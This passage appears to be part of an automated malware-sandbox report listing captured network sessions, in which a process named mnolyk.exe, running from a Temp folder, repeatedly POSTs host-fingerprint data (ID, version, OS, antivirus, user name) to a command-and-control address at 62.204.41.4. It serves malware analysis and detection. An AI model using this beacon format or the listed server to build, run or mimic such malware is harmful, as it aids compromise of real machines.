                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:39.165566921 CET521INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          374192.168.2.65009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:39.366200924 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:39.429116011 CET522INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          375192.168.2.65009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:39.663651943 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:39.726768970 CET523INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          376192.168.2.65010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:39.901405096 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:39.964401960 CET524INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          377192.168.2.65010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:40.156172991 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:40.222395897 CET525INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          378192.168.2.65010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:40.427299976 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:40.495271921 CET526INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          379192.168.2.65010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:40.685700893 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:40.756908894 CET527INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          38192.168.2.64975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:00.094396114 CET144OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:00.159466028 CET144INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          380192.168.2.65010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:40.952137947 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:41.018984079 CET528INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          381192.168.2.65010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:41.198188066 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:41.265789032 CET529INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          382192.168.2.65010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:41.451184034 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:41.514235973 CET530INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          383192.168.2.65010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:41.686559916 CET531OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:41.748126984 CET531INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          384192.168.2.65010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:41.932132959 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:41.996509075 CET532INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          385192.168.2.65010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:42.172518969 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:42.235604048 CET533INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          386192.168.2.65011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:42.417577982 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:42.481040955 CET534INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          387192.168.2.65011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:42.651134014 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:42.713891029 CET535INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          388192.168.2.65011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:42.895839930 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:42.960836887 CET536INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          389192.168.2.65011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:43.134587049 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:43.199352026 CET537INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          39192.168.2.64975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:00.338640928 CET145OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:00.400506020 CET145INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          390192.168.2.65011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:43.402147055 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:43.466646910 CET538INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          391192.168.2.65011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:43.638524055 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:43.702280045 CET539INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          392192.168.2.65011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:43.899560928 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
